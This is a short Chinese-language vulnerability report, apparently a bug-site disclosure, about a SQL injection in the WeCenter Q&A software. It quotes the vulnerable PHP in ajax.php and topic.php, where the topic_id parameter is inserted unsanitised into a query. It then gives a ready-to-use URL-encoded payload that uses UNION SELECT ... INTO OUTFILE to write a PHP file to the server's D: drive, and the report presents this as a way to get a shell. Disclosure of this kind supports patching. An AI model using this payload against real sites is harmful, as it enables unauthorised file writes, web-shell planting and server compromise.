WeCenter SQL注射(ROOT SHELL)

漏洞作者: 路人甲

文件ajax.php

public function question_list_action()
	{
		if ($_GET['feature_id'])
		{
			if ($topic_ids = $this->model('feature')->get_topics_by_feature_id($_GET['feature_id']))
			{
				$_GET['topic_id'] = implode(',', $topic_ids);
			}
		}

		switch ($_GET['type'])
		{
			case 'best':
				$action_list = $this->model('topic')->get_topic_best_answer_action_list($_GET['topic_id'], $this->user_id, intval($_GET['page']) * get_setting('contents_per_page') . ', ' . get_setting('contents_per_page'))
				
				
topic.php:
public function get_topic_best_answer_action_list($topic_ids, $uid, $limit)
	{
		$cache_key = 'topic_best_answer_action_list_' . md5($topic_ids . $limit);

		if (!$result = AWS_APP::cache()->get($cache_key))
		{
			echo " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'";
			if ($topic_relation = $this->query_all("SELECT item_id FROM " . $this->get_table('topic_relation') . " WHERE topic_id IN (" . implode(',', explode(',', $topic_ids)) . ") AND `type` = 'question'"))

url:

http://localhost/WeCenter/UPLOAD/?/topic/ajax/question_list/type-best&topic_id=1%29%20union%20select%20%27%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%27%20into%20outfile%20%27D%3A%2fshell.php%27%23

 

然后就在d盘生成shell

发表评论